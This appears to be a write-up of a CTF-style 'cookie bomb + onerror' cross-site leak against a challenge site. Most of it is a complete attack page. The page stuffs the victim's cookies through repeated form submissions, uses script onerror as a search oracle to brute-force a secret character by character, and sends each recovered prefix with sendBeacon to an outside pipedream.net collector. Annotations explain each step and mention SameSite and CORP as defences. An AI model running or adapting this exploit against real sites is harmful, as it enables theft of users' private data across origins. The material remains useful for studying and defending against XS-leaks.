
Cookie Bomb + Onerror XS Leak


The following script, taken from here, exploits a functionality that allows the user to insert any number of cookies, and then loads a file as a script, knowing that the "true" response will be larger than the "false" one. If the search succeeds, the response is a redirect whose resulting URL is longer — too large for the server to handle — so the server returns an error HTTP status code. If the search fails, nothing happens because the URL is short.

<>'";
<!-- Form that stuff() below submits repeatedly. "search" is fixed to "a"; the
     unnamed input #f receives a long value and a per-submission numeric name.
     The text above says the target lets a user plant arbitrary cookies this way
     (the "cookie bomb"); how /s turns the submitted field into a cookie is not
     visible on this page. -->
<form action="https://sustenance.web.actf.co/s" method="POST">
  <input id="f" /><input name="search" value="a" />
</form>
<script>
  // Shorthand for document.querySelector with `this` bound to document.
  const $ = document.querySelector.bind(document)
  // Promise-based delay used to pace the form submissions.
  const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
  // Counter giving each submitted #f input a distinct name (0, 1, 2, ...).
  let i = 0
  // Submit the form once into a freshly opened blank window so this page keeps
  // running. `len` is the size of the filler value placed in #f; the 100 ms
  // sleep gives the submission time to complete before the caller continues.
  const stuff = async (len = 3500) => {
    let name = Math.random()
    $("form").target = name
    // The window handle is never used; only the named target matters.
    let w = window.open("", name)
    $("#f").value = "_".repeat(len)
    $("#f").name = i++
    $("form").submit()
    await sleep(100)
  }
  // Oracle: load `url` as a cross-site <script> and resolve true if the
  // browser fires onerror, false if it fires onload. Per the description
  // above, a matching search yields an error HTTP status, which surfaces here
  // as onerror. The element is never removed, so one <script> tag is left in
  // <head> per probe.
  const isError = async (url) => {
    return new Promise((r) => {
      let script = document.createElement("script")
      script.src = url
      script.onload = () => r(false)
      script.onerror = () => r(true)
      document.head.appendChild(script)
    })
  }
  // Probe the search endpoint with `query`; resolves true when the probe errors,
  // i.e. (per the text above) when the search matched and the redirect URL
  // became too long.
  const search = (query) => {
    return isError(
      "https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
    )
  }
  // Characters tried, in this order, for each unknown flag position.
  const alphabet =
    "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
  // Attacker-controlled collection endpoint; progress is reported with sendBeacon.
  const url = "//en4u1nbmyeahu.x.pipedream.net/"
  // Flag prefix recovered so far; grows one character per successful probe.
  let known = "actf{"
  // Entry point once the page has loaded:
  //   1. report "?load" to the collection endpoint;
  //   2. fire four submissions with the default 3500-byte filler in parallel,
  //      then one with 1600 bytes (the cookie-bomb step described above; the
  //      reason for the different final size is not explained on the page);
  //   3. report "?go", then extend `known` one character at a time.
  // The while (true) has no exit condition: when every alphabet character fails
  // for a position (e.g. after the closing "}" has been found), the inner for
  // loop completes and the same pass is simply repeated. Each hit is reported
  // via sendBeacon before being appended to `known`.
  // NOTE(review): the oracle can only observe a difference if the victim's
  // cookies accompany the cross-site <script> request; cookie SameSite
  // attributes and a Cross-Origin-Resource-Policy header on the probed
  // endpoint are the controls a defender would check.
  window.onload = async () => {
    navigator.sendBeacon(url + "?load")
    await Promise.all([stuff(), stuff(), stuff(), stuff()])
    await stuff(1600)
    navigator.sendBeacon(url + "?go")
    while (true) {
      for (let c of alphabet) {
        let query = known + c
        if (await search(query)) {
          navigator.sendBeacon(url, query)
          known += c
          break
        }
      }
    }
  }
</script>
